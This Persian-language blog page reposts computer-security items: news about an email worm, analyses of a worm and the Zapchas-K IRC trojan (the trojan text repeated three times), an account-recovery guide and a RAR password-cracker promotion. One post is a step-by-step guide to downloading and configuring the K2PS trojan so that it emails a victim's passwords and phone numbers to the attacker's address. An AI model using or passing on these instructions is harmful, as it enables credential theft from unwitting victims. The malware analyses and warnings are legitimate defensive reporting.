سفارش تبلیغ
صبا ویژن
نزد نیکوترین گمانم به تو باش ای گرامی ترین گرامیان! و مرا با عصمت تأیید فرما و زبانم را به حکمت بگشای . [امام زین العابدین علیه السلام ـ در دعای استغفار ـ]
لوگوی وبلاگ
 

آمار و اطلاعات

بازدید امروز :42
بازدید دیروز :38
کل بازدید :842795
تعداد کل یاداشته ها : 1319
103/2/8
1:34 ع
مشخصات مدیروبلاگ
 
آذر آموزش[45]
باسلام من در شغل تدریس کامپیوتر هستم و دراکثر شاخه های کامپیوتر فعالیت دارم

خبر مایه
لوگوی دوستان
 

از: http://www.softestan.com
اگر پسورد فایلهای
Rar خود را فراموش کرده اید نرم افزار RAR Password Cracker آخرین امید شما خواهد بود.

تست های صورت گرفته توسط ما نشان داد این برنامه برای یافتن یک پسورد سه حرفی بیش از یک ساعت به جستجو پرداخت که شاید مدت زمان زیادی باشد اما با توجه به اینکه
RAR Password Cracker هنگام اجرا مقدار بسیار جزئی از حافظه کامپیوتر را اشتغال می کند می توانید بدون نگرانی از کاهش سرعت سیستم، آنرا برای مدت زمان طولانی فعال نگاه دارید تا به جستجوی پسورد فایل Rar اقدام کند.

این نرم افزار دارای یک محیط ظاهری کاربرپسند و بسیار راحت است. در هنگام اجرا نرم افزار پیش بینی می کند که چه مدت زمان لازم است تا پسورد فایل
Rar شکسته شود. ضمن آنکه همیشه می توانید با کلیک بر روی آیکون کوچک شده ی برنامه، مقدار زمان باقی مانده را مشاهده کنید.

در صورتیکه پس از زمان مشخصی نرم افزار نتوانست پسورد فایل
Rar را تشخیص دهد و شما نیازمند خاموش کردن سیستم خود بودید، این برنامه می تواند در راه اندازی بعدی ویندوز مجددآ جستجوی خود را از همان مقدار قبلی ادامه دهد.

آخرین نسخه از این نرم افزار
RAR Password Cracker 4.12 می باشد که با استفاده از دو روش به یافتن پسوردها اقدام می کند روش نخست "bruteforce" و روش دوم "dictionary" است. هرچند که فایل های "dictionary" بصورت پیش فرض در برنامه وجود ندارند و شما باید خود آنها را به نرم افزار اضافه کنید.

نرم افزار
RAR Password Cracke برنامه ای کارآمد برای تمامی کاربرانی است که روزانه با تعداد زیادی فایل های فشرده Rar سر و کار دارند.
http://www.rarpasswordcracker.com/rpc412_setup.exe
منبع: سافتستان


86/9/22::: 12:0 ص
نظر()
  
  

 

منبع: روزنامه جام‌جم

انتشار ویروس اینترنتی با سوء استفاده از اخبار طوفانهای اخیر در کشورهای اروپایی

احتمالاً در طول یک ماه گذشته، اخبار مربوط به طوفانهای شمال و شمال‌غرب اروپا را در اخبار و روزنامه‌ها مطالعه کرده‌اید و از خسارات سنگینی که این طوفانها به جا گذاشته‌اند با خبرید طوفانهایی که در طول چند سال اخیر در اروپا بی‌سابقه بوده‌اند و به جزء خسارات مالی به جای مانده از آنها، خسارات جانی زیادی را به همراه داشت و تعدادی از مردم اروپا را به کام مرگ کشاند. تصور کنید در چنین شرایطی که نیروهای امدادی در اکثر کشور‌های اروپایی در شرایط آماده باش بودند و خانواده‌ها پی‌گیری آمار مجروحین و آسب دیده‌گان خود هستند، برخی افراد سود جو هم از این موقعیت به نفع خود استفاده می‌کنند. معمولاً در این گونه شرایط، دزدان و سارقان از فرصت استفاده می‌کنند و به خانه‌های آسیب دیده دست‌برد می‌زنند، اما افراد سود جوی دیگری هم وجود دارند که در دنیای اینترنت منتظر چنین فرصتهایی هستند. در حالی که اکثر کاربران سعی می‌کنند از طریق شبکه اینترنت، اخبار مربوط به این حادثه و طوفان عظیم اروپا را  پی‌گیری کنند، هکر‌های اینترنتی هم وقت را مقتنم می‌شمارند و برای حمله به کامپیوتر کاربران کمین می‌کنند.

 

طوفان اروپایی

 

تصور کنید برای کسی که یکی تاز نزدیکان و دوستان او در متن حادثه قرار دارد و هیچ خبری از او ندارد، یک نامه الکترونیکی با عنوان ((لیست کشته شده‌گان حادثه طوفانهای اروپا)) و یا ((تصاویر به دست آمده از طوفان اروپا)) ارسال شود، ممکن است بدون درنگ نامه را باز کند و  فایل ضمیمه آنرا باز کند.

تنها چند روز پس از انتشار خبر طوفان در کشورهای اروپایی، یک ویروس رایانه‌ای در شبکه اینترنت انتشار یافت که از طریق نامه‌های الکترونیکی انتقال می‌یابد این ویروس که روی سرویسهای پست الکترونیکی تأثیر می‌گذارد به سرعت منشر می‌شود و تا کنون توانسته رایانه‌های زیادی را کشورهای اروپایی آلوده کند شرکتهای امنیتی نام این ویروس را با توجه به موضوع انتخابی آن، ویروس ((طوفان اروپایی)) اعلام کرده‌اند. شرکتهای امنیتی و ضد ویروسی در ساعات ابتدایی انتشار این ویروس حوزه فعالیت این ویروس را کشورهای اروپایی و برخی کشورهای آمریکایی اعلام کردند. اما ظرف کمتر از 24 ساعت از اعلام این خبر، این طوفان اروپایی، به کشورهای آسیایی هم راه یافت و به خصوص در کشورهای آسیای شرقی کامپیوتر‌های زیادی مورد هدف قرار داد پیش‌‌بینی می‌شود با توجه به سرعت بالای انتشار آن تا چند هفته آینده وارد کشور ما هم بشود البته زیاد نگران این مسئله نباشید، زیرا اکثر نرم افزارهای ضد ویروسی و امنیتی توانسته‌اند آنرا شناسایی و با آن مقابله کند به همه شما عزیزان توصیه می‌کنیم، در هنگام مراجعه به صندوق پست الکترونیکی خود،‌ از باز کردن هر گونه نامه مشکوک خودارری کنید و از هم اکنون برای بروز رسانی نرم افزار ضد ویروسی کامپیوتر خود اقدام کنید.

در بیشتر موارد، موضوع نامه الکترونیکی منتقل کننده این ویروس عبارت ((تصاویر 230 نفر از کشته شدگان حادثه طوفان اروپا)) گزارش شده است. همچنین چند نمونه از فایلهای ضمیمه شده به نامه مذکور نیز عبارتند از ((Full Clip.exe)) ، ((Full Story.exe)) ، ((Read More.exe)) و ((Video.exe)) نکته بسیار مهم در مورد این ویروس این است که هنگام کلیک کاربر بر روی نامه الکترونیکی مذکور، ویروس شروع به فعالیت می‌کند و اجرای آن نیاز به دانلود و اجرای فایل ضمیمه ندارد.

 

سوء استفاده از کاربران

 

هدف اصلی از انتشار ویروس ((طوفان اروپایی))، آلوده کردن کامپیوتر‌ها و سوء استفاده از آنها برای فعالیتهای مخرب بعدی است این ویروس پس از ورود به سیستم کاربران، اطلاعات شخصی کاربر را به سرقت می‌برد و سپس با تئجه به برنامه‌های مخرب خود، از آن کامپیوتر و صندوق پستی کاربر برای ارسال نامه‌های پر حجم (هرزنامه) استفاده می‌کند.

شرکتهای امنیتی برخی از نسخه‌های این ویروس را جزو نرم‌افزار‌های تروجان بحساب آورده‌اند. نرم افزار‌های تروجان می‌توانند بدون آنکه کاربر از فعالیتهای این نرم افزار مطلع شود از کامپیوتر او سوء استفاده کنند و از آن برای اهداف شوم خود بهره برداری کنند.

کاربران ساده‌لو

 

متأسفانه تا کنون در چندین مورد نمونه مشابه این اتفاقات و این حمله‌های ویروسی را در شبکه اینترنت مشاهده کرده‌ایم. چند سالی است که هکرهای اینترنتی از اخبار مهم و روز دنیا برای مقاصد پلید خود استفاده می‌کنند و کاربران تازه کار و ناآگاه، به راحتی با این ترفندها فریب می‌خورند. از نمونه این ویروسها می‌تواند در زمان زلزله سونامی و به دار آویخته شدن صدام حسین اشاره کرد.


  
  

منبع: روزنامه جام جم

ویروس

تاریخ انتشار:2007 January 16

سیستم عامل‌های آسیب‌پذیر، ویندوزهای xp ,Server 2003 , NT , Windows Me , Windows 2000 , 95 , 98 این کرم، پس از الوده کردن سیستم عامل قربانی، خود را با نام Logo1.exe در پوشه ویندوز و همچنین با نام pif.exe در مسیر اصلی کلیه درایورهای کامپیوتر ذخیره می‌کند. این کرم برای مخفی ماندن و جلوگیری از پاکسازی سیستم عامل توسط آنتی‌ویروسها، تمامی Processها را با نام‌های زیر می‌بندد:

FrogAgent.exe Mcshield.exe

Ravmon.exe spoclsv.exe

VsTskmgr.exe naPrdmgr.exe

TrojDie.kxp UpdaterUI.exe

Rundll23.exe TBMon.exe

RavmonD.exe Ravtask.exe

Ravmon.exe

اگر سیستم عامل به نسخه‌های قدیمی این کرم آلوده باشند، کرم جدید نسخه‌های قدیمی را پاک می‌کند و خود را جایگزین آن می‌کند. این کرم برای انتشار خود از دو روش استفاده می‌کند.

در روش اول، با استفاده از شبکه‌های به اشتراک گذاشته شده، خود را به کامپیوترهایی که پسورد ساده‌ای دارند، انتقال می‌دهند. در روش دوم، جست و جوی فایلهای exe موجود در کامپیوتر قربانی می‌پردازدسپس تمام آنها را آلوده می‌کند. اگر هر یک از فایلهای exe از از کامپیوتر آلوده شده به کامپیوتر دیگری انتقال یابد در صورت اجرا شدن فایل exe درون کامپیوتر جدید آن نیز آلوده می‌شود این کرم برای update کردن خود، اقدام به اتصال به یک وب سایت به آدرس mm.21380.com‌ می‌کند و از طریق آن نسخه‌های جدید و به روز شده خود را دریافت می‌کند.


  
  

منبع: روزنامه جام‌جم

رشد روز افزون حمله اسب‌های تروا به شرکتها و سازمان‌ها معتبر

اولین روز ماه دسامبر سال 2005،‌ دو نامه الکترونیکی از رایانه‌ای در کشور استرالیا به دو سازمان مختلف حقوقی فرستاده شد. به هر کدام از این نامه‌ها یک فایل مایکروسافت‌ورد ضمیمه شده بود. اما این فایل یا سایر فایلهای ورد تفاوت داشت. این فایل یک نرم‌افزار جاسوسی بود که در پشت یک فایل متنی مخفی شده بود. پس از از باز شدن این فایلها، به طرز مرموزی کنترل شبکه داخلی این دو سازمان به دست افراد ناشناخته‌ای افتاد. به طوری که این کروه توانستند به راحتی از خارج از سازمان، به تمام رایانه‌های متصل به این شبکه و اطلاعات درون آنها تسلط داشته باشند. هر چند که بعد از مدت کوتاهی این سازمانها رایانه‌های خود را پاکسازی کردند و مانع دسترسی تبهکاران به رایانه‌های داخلی شدند. اما چند هفته بعد باز هم از طریق دیگری رایانه‌های این دو سازمان مورد حمله نرم‌افزار‌های تروجان قرار گرفت و صدماتی به سیستم‌های داخلی آنها وارد شد.

امروزه در دنیای اینترنت بارها شاهد اینگونه اتفاقات و یا حملات شدیدتر اسب‌های تروا، ویروسها و نرم‌افزار‌های جاسوسی اینترنتی هستیم. کمتر پیش می‌آید که این برنامه‌ها با هدف حمله به یک یا چند رایانه خانگی بکار گرفته شوند. بیشتر برنامه‌های تروجان، به هدف حمله به سازمانهای دولتی، شرکتهای خصوصی وسازمانهای سیاسی و نظامی مورد استفاده قرار می‌گیرند.

شیوه نفوذ این نرم افزار‌ها هم همانگونه که عنوان شد، معمولاً‌ از طریق نامه‌های الکترونیکی است. شرکت امنیتی Messagelabs که در ضمینه سیستم‌های امنیتی صندوقهای پستی فعالیت می‌کند در گزارشی اعلام کرده است که پول یک سال، یعنی از ماه می 2005 تا می 2006، بیش از 500 مورد حمله به شبکه‌های اینترنتی و اینترانتی گزارش شده که حدود 300 مورد از این حملات از طریق نامه‌های الکترونیکی انجام گرفته است.

امروزه حملات از پیش تعیین شده اسب‌های تروا، به مهمترین دغدغه شرکتهای تولید کننده نرم‌افزار‌های ضد ویروسی و به طور کلی صنعت امنیت رایانه تبدیل شده است خطرات ناشی از این حملات و افزایش روز افزون آنها را سال گذشته، گروه‌های پاسخ‌گویی به حوادث غیر منتظره رایانه‌ای در انگلستان، کانادا و استرالیا هشدار داده بودند.

 

تروجانهای ضعیف

مسئله اصلی که بیشتر باعث اعتراض شرکتهای بزرگ، ادارات دولتی و دیگر سازمانهای معتبر می‌شود این است که نرم‌افزار‌های ضد ویروسی در جلوگیری از حملات کوچک و ضعیف چندان خوب عمل نمی‌کنند برنامه‌های ضد ویروسی متداول معمولاً ویروسیها و برنامه‌هایی را شناسایی می‌کنند که در چندین شبکه و یا سازمان اجرا شده‌اند و توسط شرکت ضد ویروسی پشتیبان آن شناسایی شده است. گاهی پیش می‌آید که یک ویروس یا کرم ساده به یک شبکه محلی وارد می‌شود ولی نرم‌افزار امنیتی موجود قادر به شناسایی و یا از بین بردن آن نیست. در این مواقع مسئولین و مدیران شبکه‌ها برای از بین بردن این برنامه‌ها، شرکتهای پشتیبان را با‌خبر می‌کنند و در نهایت زمانی سیستم را از وجود آنها پاک می‌کنند که ممکن است کار از کار گذشته باشد و هکرها به اطلاعات مورد نظرشان دست پیدا کرده باشند.

معمولاً چنانچه شبکه‌ای نتواند اولین حمله را به موقع دفع کند، صدمات مالی زیادی خواهد دید به عنوان مثال چند ماه قبل، یک شرکت داروسازی معتبر دراسترالیا مورد حمله یک تروجان قرار گرفت و قبل از آنکه سیستم امنیت این شرکت بتواند اقدام لازم را انجام دهد، از طریق یک برنامه جانبی که به همراه این تروجان وارد شبکه داخلی‌ آن شده بود، تمامی اطلاعات این شرکت روزگزاری شد و مانع دسترسی کاربران این شرکت به اطلاعات موجود روی سرور شد چند روز بعد از این اتفاق، عوامل این نرم افزار از شرکت مذکور مبلغی سی میلیون دولار را درخواست کردند این شرکت هم برای راه‌اندازی مجدد سیستم رایانه‌ای خود مجبور به پرداخت آن شد و پس از آن هم حدود یک ماه طول کشید تا سیستم‌های دفتر مرکزی این شرکت و سیستمهای سه دفتر نمایندگی در کشورهای دیگر از تروجان مورد نظر پاک‌سازی شوند.

نکته جالب در مورد این تروجان این است که برنامه‌ای بسیار ساده و پیش پا افتاده داشته و هیچکدام از نرم‌افزار‌های امنیتی این شرکت داروسازی آنرا شناسایی نکردند همچنین این برنامه از طریق یک نامه الکترونیکی وارد سیستم شرکت شده بود که متن آن نامه حاوی درخواست یک شرکت خیالی برای خرید و سفارش دارو بوده است بدن ترتیب مشخص شد، این تروجان با یک هدف از پیش برنامه‌ریزی شده وارد این شبکه شده بود.

منبع: Securityfocus.com


  
  

منبع: http://irtnt.persianblog.com

این تروجان تمام پسورد ها و شماره تلفن های وارد شده در سیستم قربانی را برای شما میل می کند !
طرز کار آن هم خیلی ساده است .
اول برنامه را از لینک http://www.sharemation.com/tnt7/booters/K2PS034.zip دانلود کنید و از حالت زیپ خارجش کنید فایل K2pS_setup را اجرا کنید .دکمه open را بزنید .
حال یکی از فایلهای کناری این برنامه را انتخاب کنید و open را بزنید ... فایل اولی که K2pS است تمام یوزر پسورد ها و شماره ها را برای شما هر زمان که قربانی به اینترنت وصل شود برای شما فرستاده می شود و دومی که K2pS_full است همان کار را می کند با این تفاوت که دیگر پسورد های تکراری را برای شما نمی فرستد !

حالا بعد از انتخاب سرور .. در قسمت smtp srver : باید آدرس سرور میل را وارد کنید (که چندتا میل سرور را برای شما اخر می نویسم)
و در قسمت destination adress ایمیلی که باید اطلا عات به آن فرستاده شود (ایمیل خود شما)

در قسمت source address هم اسم قربانی یا هر چی که دوست دارید وارد کنید و بعد دکمه save را بزنید .. سرور شما آماده است توجه کنید که فایلی را ایجاد نمی کند در واقع فایل سروری که انتخاب کردید را ویرایش می کند .. پس فایل سرور همان فایلی است که open کردید ... .

ادرس سرورها : noavar.com
mail.noavar.com
yahoo.com
mx1.mail.yahoo.com mx2.mail.yahoo.com mx4.mail.yahoo.com


  
  

منبع: http://rightclick.ir

در این قسمت سعی دارم روش پس گرفتن ایمیلمون رو از هکر توضیح بدهم .
این توضیحات هر شامل 10 عکس است که به علت محدودیت فقط لینک اون ها رو می گزارم ...
کلا سایت های ارایه دهنده ایمیل موقع ثبت نام معمولا یه سوال امنیتی می پرسند (برای این که اگه پسوردتون یادتون رفت بتونید اون رو برگردونید) مثلا نام حیوان دست آموزتان یا نام اولین مدرسه ای که رفتید یا ...همچنین بعضی از اونا تاریخ تولد و چیزای دیگه ای هم می پرسند ...
که شما با دونستن اون ها می تونید به راحتی پسورد خود را عوض کنید ...
برای این منظور من آموزش این کار رو توی سرویس ایمیل یاهو توضیح می دم :
اول از همه بایستی موقع ثبت نام این مشخصات رو که بهتون می ده رو بدونید یا یه پرینت ازش بگیرید :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/001.gif

خوب برای باز یابی پسورد یا پس گرفتن ایمیلمون از هکر مراحل زیر را طی می کنیم:
(
توجه : این مراحل برای سرویس ایمیل یاهو نوشته شده اند ولی بقیه ارایه دهندگان سرویس ایمیل هم چیزی شبیه به این دارند).

*
ابتدا به قسمت ورود می رویم :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/002.gif

و بعد بر روی لینک Forget your Password کلیک می کنیم . وارد قسمت بعد می شویم :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/003.gif

این فرم را مطابق شکل زیر پر می کنیم :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/004.gif

در این قسمت برای دریافت پسورد جدید در قسمت پایین صفحه می توانید ID خود و یا ایمیل دیگر خود (در موقع ثبت نام یک ایمیل دیگر غیر از یاهو را به صورت اختیاری می توانید وارد کنید که اینجا به دردتون می خوره) را وارد می کنیم.ما فرض می کنیم که ایمیل دیگر هم نداشته باشیم . پس با وارد کر دن ID ور کلیک بر روی دکمه Get New Password به قسمت بعد می رویم :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/005.gif

در این قسمت سوال امنیتی که موقع ثبت نام وارد کرده ایم را از ما می پرسد . پس از درست جواب دادن به این سوال دیگر کار تمام است و پسورد جدید را به ما می دهد :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/006.gif

خوب حالا کافی است که برروی لینک مشخص شده کلیک کنیم و با پسورد جدیدی که خود یاهو به ما داده است وارد ایمیل خود شویم:

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/007.gif

خوب پس از وارد شدن صفحه زیر نمایش داده می شود و از شما تقاضا می کند که پسورد خود را عوض کنید :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/008.gif

پس از تعویض پسورد تان به شما پیام موفقیت را نمایش می دهد :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/009.gif

بعد از این دیگر این ایمیل در اختیار شما است :

لینک عکس : http://www.cjb.cc/members/mojtaba/images/webloghack/010.gif


  
  

نویسنده :: آرش حسینیان

نام :: نام
Troj/Zapchas-K
نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار ::
Backdoor.Win32.mIRC-based و IRC/Flood.mirc

وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت

تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های
IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه
System کپی می کند :
svchost.exe
script.ini
همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::


mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt


و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :


HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe

 


  
  

نویسنده :: آرش حسینیان
نام :: نام
Troj/Zapchas-K
نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار ::
Backdoor.Win32.mIRC-based و IRC/Flood.mirc
وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت

تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های
IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه
System کپی می کند :


svchost.exe
script.ini


همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::


mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt


و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :


HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe


نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار ::
Backdoor.Win32.mIRC-based و IRC/Flood.mirc

وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت

تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های
IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه
System کپی می کند :
svchost.exe
script.ini
همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::


mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt


و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :


HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe

 


  
  

نویسنده :: آرش حسینیان
نوع :: تروجان
شدت پخش :: 1
سیستم عامل هدف :: ویندوز
طریقه پخش :: برنامه های گفتمان
نام مستعار ::
Backdoor.Win32.mIRC-based و IRC/Flood.mirc

وظایف ::
1 - دسترسی دیگران به منابع سیستم
2 - دزدین اطلاعات
3 - اجرای ویروس های دیگر
4 - دانلود کد های خود از اینترنت

تشریح ::
این تروجان که روی سیستم عامل های ویندوز فعالیت می کند سعی می کند از طریق کانال های
IRC برای هکر بر روی سیستم عامل هدف دسترسی ایجاد کند . همچنین سعی می کند از همین کانال ها از طریق DCC به نام فایل postcard.gif.exe پخش شود .
در پشتی این تروجان قابلیت دزدین اطلاعات و دانلود و اپلود فایل و اجرای برنامه ها را به ویروس نویس می دهد .این تروجام هنگامی که برای اولین بار اجرا می شود خود را با نام فایل های زیر در شاخه
System کپی می کند :


svchost.exe
script.ini


همچنین این تروجان فایل های زیر را بر روی سیستم هدف می سازد ::


mirc.ini
msg.txt
nicks.txt
pri.txt
remote.ini
serv.txt
servers.ini
sup.bat
sup.reg
username.txt


و همچنین این شاخه ها را در رجیستری ویندوز درست می کند :


HKLM\SOFTWARE\CLASSES\irc\Shell\open\command
@
"C:\Windows\System\svchost.exe" -noconnect
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
GNP Generic Host Process
"C:\Windows\system\svchost.exe

 


  
  

اساسا” تمامی این موارد تحت گروه کلی ویروس ها قرار می گیرند. با این حال تفاوت های کمی هم بین این سه مورد وجود دارد. ویروس – یک ویروس از لحاظ فنی(با چسبیدن یا وارد شدن به فایل ) فایل دیگری را آلوده می کند. آنها معمولا” فایل های برنامه یا مدارک Ms office را آلوده می کنند. از این طریق آنها تکثیر می شوند و خسارت وارد می کنند. ویروس ها بر خلاف کرم ها به تنهایی عمل نمی کنند. کرم- کرم ها تقریبا” با « ویروس واقعی »یکی هستند. به جز اینکه کرم ها می توانند به تنهایی به فعالیت خود ادامه دهند و به طور کلی سایر فایل ها را نیز آلوده نمی کنند (ولی جایگزین فایل می شوند). کرم ها معمولا” با استفاده از ایمیل، شبکه،دیسک یا .... خود را کپی می کنند. بازیگر باید گفت که کرم ها خیلی شبیه ویروس ها هستند و خسارت های مشابهی را نیز به وجود می آورند. اسب های تروا- این برنامه خودش را تکثیر نمی کند اما به کامپیوتر بر آسیب می رساند. در این برنامه کاربران هستند که باعث انتشار و اجرای اسب های تروا می شوند. اسب های تروا خود را ایمیل نمی کنند. اسب های تروا شبیه یک برنامه بی ضرر چون محافظ صفحه نمایش یا لطیفه هستند و به این طریق منتشر می شوند.


  
  
   1   2   3   4   5      >